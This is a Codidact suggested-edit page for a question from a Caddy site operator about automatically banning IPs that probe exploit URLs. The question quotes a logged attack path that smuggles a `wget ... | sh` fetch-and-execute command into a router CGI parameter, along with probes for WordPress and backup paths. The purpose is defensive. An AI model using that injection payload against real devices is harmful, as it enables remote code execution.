Communities

Writing
Writing
Codidact Meta
Codidact Meta
The Great Outdoors
The Great Outdoors
Photography & Video
Photography & Video
Scientific Speculation
Scientific Speculation
Cooking
Cooking
Electrical Engineering
Electrical Engineering
Judaism
Judaism
Languages & Linguistics
Languages & Linguistics
Software Development
Software Development
Mathematics
Mathematics
Christianity
Christianity
Code Golf
Code Golf
Music
Music
Physics
Physics
Linux Systems
Linux Systems
Power Users
Power Users
Tabletop RPGs
Tabletop RPGs
Community Proposals
Community Proposals
tag:snake search within a tag
answers:0 unanswered questions
user:xxxx search by author id
score:0.5 posts with 0.5+ score
"snake oil" exact phrase
votes:4 posts with 4+ votes
created:<1w created < 1 week ago
post_type:xxxx type of post
Search help
Notifications
Mark all as read See all your notifications »
Users Search
Help Dashboard Sign In Sign Up
Q&A Meta

Review Suggested Edit

You can't approve or reject suggested edits because you haven't yet earned the Edit Posts ability.
View post

Approved.
This suggested edit was approved and applied to the post about 2 months ago by matthewsnyder‭.

33 / 255 
How to automatically block IPs that try exploit URLs?
  • I have a static website I serve with Caddy. The Caddy is inside a container.
  • I notice that occasionally I get malicious requests, looking at the paths requested. Some examples are:
  • * `/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`wget+http://[ some ip ]/t+-O-+|+sh`)`
  • * `/backup`
  • * `/wp-admin/css/about.php`
  • These are obviously hackers trying some common exploits to see if they'll get lucky and I want to block them automatically. For example, I could provide a list of string patterns and maybe any IP that requests a path that matches those will get an IP ban for a month.
  • I realize hackers can obtain fresh IPs in various ways. I still want to do the IP ban just to make their life harder.
  • How can I do this?
  • I have a static website I serve with Caddy. The Caddy is inside a container.
  • I notice that occasionally I get malicious requests, looking at the paths requested. Some examples are:
  • * ``/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`wget+http://[ some ip ]/t+-O-+|+sh`)``
  • * `/backup`
  • * `/wp-admin/css/about.php`
  • These are obviously hackers trying some common exploits to see if they'll get lucky and I want to block them automatically. For example, I could provide a list of string patterns and maybe any IP that requests a path that matches those will get an IP ban for a month.
  • I realize hackers can obtain fresh IPs in various ways. I still want to do the IP ban just to make their life harder.
  • How can I do this?
server security caddy
server security caddy

Suggested about 2 months ago by Michael‭